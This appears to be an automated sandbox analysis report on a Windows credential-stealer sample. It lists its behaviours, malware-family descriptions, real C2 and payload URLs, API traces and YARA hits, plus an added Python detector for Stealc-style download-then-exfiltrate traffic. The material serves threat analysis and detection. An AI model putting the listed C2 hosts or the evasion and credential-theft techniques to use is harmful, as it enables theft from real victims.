Windows Analysis Report
sx8RE6LbG0.exe

Overview

General Information

Sample name: sx8RE6LbG0.exe
(renamed because the original name is a hash value)
Original sample name: c4abdb03cdb7f5f76b4e83a208b222f0.exe
Analysis ID: 1433039
MD5: c4abdb03cdb7f5f76b4e83a208b222f0
SHA1: 76e3f6bcd2bdf0048a5097a50f87e69a02c47521
SHA256: 9350faf52b3bd8f727cfe9385d176f28e1b11d5b79cb6574898043eea6a2a86a
Tags: exe, Stealc

Detection

Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected SectopRAT
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and RedLine. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name: zgRAT
Description: zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla. zgRAT has an infostealer use which targets browser information and cryptowallets. It usually spreads by USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection

Source: http://185.172.128.59/syncUpd.exe URL Reputation: Label: malware
Source: http://185.172.128.228/ping.php?substr=two Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\jipsoiol Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\dvffdl Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.150/c698e1bc8a2f5e6d.php"}
Source: 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.172.128.150/c698e1bc8a2f5e6d.php"}
Source: http://185.172.128.150/c698e1bc8a2f5e6d.php Virustotal: Detection: 14% Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll Virustotal: Detection: 5% Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll Virustotal: Detection: 6% Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll Virustotal: Detection: 6% Perma Link
Source: http://185.172.128.228/ping.php?substr=two Virustotal: Detection: 18% Perma Link
Source: http://185.172.128.150/c698e1bc8a2f5e6d.phpu Virustotal: Detection: 7% Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll Virustotal: Detection: 7% Perma Link
Source: http://185.172.128.150/c698e1bc8a2f5e6d.phpy Virustotal: Detection: 5% Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll Virustotal: Detection: 5% Perma Link
Source: http://185.172.128.150/c698e1bc8a2f5e6d.phpv Virustotal: Detection: 5% Perma Link
Source: C:\Users\user\AppData\Local\Temp\dvffdl ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\jipsoiol ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\UIxMarketPlugin.dll ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll ReversingLabs: Detection: 18%
Source: sx8RE6LbG0.exe Virustotal: Detection: 39% Perma Link
Source: C:\Users\user\AppData\Local\Temp\jipsoiol Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dvffdl Joe Sandbox ML: detected
Source: sx8RE6LbG0.exe Joe Sandbox ML: detected
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: CtIvEWInDoW
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: AgEBOxw
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: ijklmnopqrs
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: /#%33@@@
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: abcdefghijklmnopqrs
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: @@@@<@@@
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: abcdefghijklmnopqrs
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/|
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: %s\%V/yVs
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: %s\*.
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: }567y9n/S
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: ntTekeny
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: ging
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: PassMord0
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: J@@@`z`@J@@@J@@@
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: OPQRSTUVWXY
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: 456753+/---- '
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: '--- '
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: n|
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: HeapFree
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: GetLocaleInfoA
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: ntProcessId
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: wininet.dll
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: shlwapi.dll
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: shell32.dll
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: .dll
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: column_text
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack String decryptor: login:
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree, 2_2_00409540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 2_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 2_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 2_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 2_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCBA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 2_2_6BCBA9A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCB43B0 PK11_PubEncryptPKCS1,PR_SetError, 2_2_6BCB43B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCE0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 2_2_6BCE0180
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCDA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 2_2_6BCDA730
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC9E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 2_2_6BC9E6E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCBA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 2_2_6BCBA650
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC98670 PK11_ExportEncryptedPrivKeyInfo, 2_2_6BC98670
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 2_2_6BD025B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCB44C0 PK11_PubEncrypt, 2_2_6BCB44C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCB4440 PK11_PrivDecrypt, 2_2_6BCB4440
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC84420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 2_2_6BC84420
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCDDA40 SEC_PKCS7ContentIsEncrypted, 2_2_6BCDDA40
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCB9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate, 2_2_6BCB9840
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCB3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 2_2_6BCB3850
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCB3FF0 PK11_PrivDecryptPKCS1, 2_2_6BCB3FF0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCD9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 2_2_6BCD9EC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC97D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 2_2_6BC97D60
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_00254280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_00254280
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_002545A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext, 3_2_002545A0
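The Stealc description in the Classification section and the URLs in this section together give the detectable shape of this sample: the stealer pulls a fixed set of legitimate NSS/CRT DLLs from its C2 host (the /b7d0cfdb1d966bdd/*.dll entries above), uses them to decrypt saved logins (the PK11SDR_Decrypt call in 2_2_0040BF90 is Firefox NSS; the CryptUnprotectData calls in 2_2_00409540 and 2_2_00406C10 are DPAPI for Chromium-style stores; the PK11_*/SEC_* functions at the 0x6BC... addresses are the dropped nss3.dll's own code, not malware logic), and then POSTs the results file by file to a .php endpoint on the same host. The Python below is an added example and is not part of the Joe Sandbox report: it pulls the network IOCs out of report lines in the form shown above and runs a simple download-then-exfiltrate correlation over constructed proxy log lines. The proxy log, the min_dlls/min_posts thresholds, and the folding of the .phpu/.phpy/.phpv variants back to .php (assumed to be one trailing byte picked up when the URL was carved from memory) are assumptions of the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# The seven helper DLLs the Stealc description says are fetched before the
# browser databases are read; the report shows them served from 185.172.128.150.
STEALC_HELPER_DLLS = {
    "sqlite3.dll", "nss3.dll", "vcruntime140.dll", "mozglue.dll",
    "freebl3.dll", "softokn3.dll", "msvcp140.dll",
}

# Lines copied from the report's "AV Detection" section ("Source: <url> <verdict>").
REPORT_LINES = [
    "Source: http://185.172.128.59/syncUpd.exe URL Reputation: Label: malware",
    "Source: http://185.172.128.228/ping.php?substr=two Avira URL Cloud: Label: malware",
    'Source: 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp '
    'Malware Configuration Extractor: StealC {"C2 url": "http://185.172.128.150/c698e1bc8a2f5e6d.php"}',
    "Source: http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll Virustotal: Detection: 5% Perma Link",
    "Source: http://185.172.128.150/c698e1bc8a2f5e6d.phpu Virustotal: Detection: 7% Perma Link",
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Assumption: ".phpu"/".phpy"/".phpv" are ".php" plus one trailing byte carved
# from process memory, so they are folded into the real ".php" endpoint.
TRAILING_BYTE_RE = re.compile(r"\.php[a-z]$")


def extract_network_iocs(lines):
    """Map each host named in the report lines to the set of URL paths seen for it."""
    iocs = defaultdict(set)
    for line in lines:
        for url in URL_RE.findall(line):
            parts = urlsplit(url)
            iocs[parts.hostname].add(TRAILING_BYTE_RE.sub(".php", parts.path))
    return dict(iocs)


def parse_proxy_line(line):
    """Constructed log format (assumption): '<client> <method> <url> <status>'."""
    client, method, url, status = line.split()
    return client, method, urlsplit(url), int(status)


def match_known_iocs(log_text, iocs):
    """Return every logged URL whose host and path appear in the report IOCs."""
    hits = []
    for line in log_text.splitlines():
        _client, _method, parts, _status = parse_proxy_line(line)
        if parts.path in iocs.get(parts.hostname, ()):
            hits.append(parts.geturl())
    return hits


def find_stealc_sessions(log_text, min_dlls=3, min_posts=2):
    """Flag (client, host) pairs that fetched several helper DLLs from one host
    and also POSTed repeatedly to a .php endpoint on that same host: the
    download-then-exfiltrate sequence described for Stealc. The thresholds are
    assumptions; tune them against real proxy data."""
    dlls_by_key = defaultdict(set)
    posts_by_key = defaultdict(int)
    for line in log_text.splitlines():
        client, method, parts, _status = parse_proxy_line(line)
        key = (client, parts.hostname)
        basename = parts.path.rsplit("/", 1)[-1].lower()
        if method == "GET" and basename in STEALC_HELPER_DLLS:
            dlls_by_key[key].add(basename)
        elif method == "POST" and parts.path.endswith(".php"):
            posts_by_key[key] += 1
    return [
        {"client": c, "host": h, "dlls": sorted(dlls_by_key[(c, h)]),
         "posts": posts_by_key[(c, h)]}
        for (c, h) in sorted(dlls_by_key)
        if len(dlls_by_key[(c, h)]) >= min_dlls and posts_by_key[(c, h)] >= min_posts
    ]


# Constructed proxy log, not captured traffic: one infected client (192.168.2.5,
# the sandbox VM address in the report) plus a benign client for contrast.
PROXY_LOG = """\
192.168.2.5 POST http://185.172.128.150/c698e1bc8a2f5e6d.php 200
192.168.2.5 GET http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll 200
192.168.2.5 GET http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll 200
192.168.2.5 GET http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll 200
192.168.2.5 GET http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll 200
192.168.2.5 GET http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll 200
192.168.2.5 GET http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll 200
192.168.2.5 GET http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll 200
192.168.2.5 POST http://185.172.128.150/c698e1bc8a2f5e6d.php 200
192.168.2.5 POST http://185.172.128.150/c698e1bc8a2f5e6d.php 200
192.168.2.7 GET http://cdn.example.test/vcruntime140.dll 200
192.168.2.7 POST http://intranet.example.test/upload.php 200
"""

if __name__ == "__main__":
    known = extract_network_iocs(REPORT_LINES)
    for url in match_known_iocs(PROXY_LOG, known):
        print("known IOC hit:", url)
    for session in find_stealc_sessions(PROXY_LOG):
        print("Stealc-like session:", session)
```

The exact-IOC match only catches this C2 host; the behavioural correlation in find_stealc_sessions is the part that survives a C2 change, because the seven DLL names come from the stealer's design rather than from this sample's configuration. A benign client that fetches one CRT DLL from a CDN and POSTs to an unrelated host is deliberately included and is not flagged.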

Exploits

Source: Yara match File source: 3.2.run.exe.410ed5b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.556c264.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.run.exe.40ca86d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.run.exe.3903d5b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.515de64.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.run.exe.38bf86d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.5119976.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.556ce64.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.run.exe.390315b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.515d264.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.run.exe.410e15b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5528976.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: run.exe PID: 1408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: run.exe PID: 1396, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1532, type: MEMORYSTR

Compliance

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Unpacked PE file: 0.2.sx8RE6LbG0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Unpacked PE file: 2.2.u2ts.0.exe.400000.0.unpack
Source: sx8RE6LbG0.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49715 version: TLS 1.0
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 185.93.1.243:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: nss3.pdb@ source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296210614.0000021731FC0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\jizafova\bugu-44_jikeg_37\kisusilogeguw\rawubexuh.pdb source: sx8RE6LbG0.exe
Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296762074.0000021732190000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: wntdll.pdb source: run.exe, 00000003.00000002.2169721590.0000000004A01000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169460946.0000000004550000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169111990.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613691350.0000000004D68000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613947415.0000000005240000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000016.00000002.2706144763.000000000410D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000016.00000002.2703363636.00000000039F1000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000016.00000002.2705188750.0000000003D50000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2871966588.000000000517A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873741315.0000000005650000.00000004.00001000.00020000.00000000.sdmp
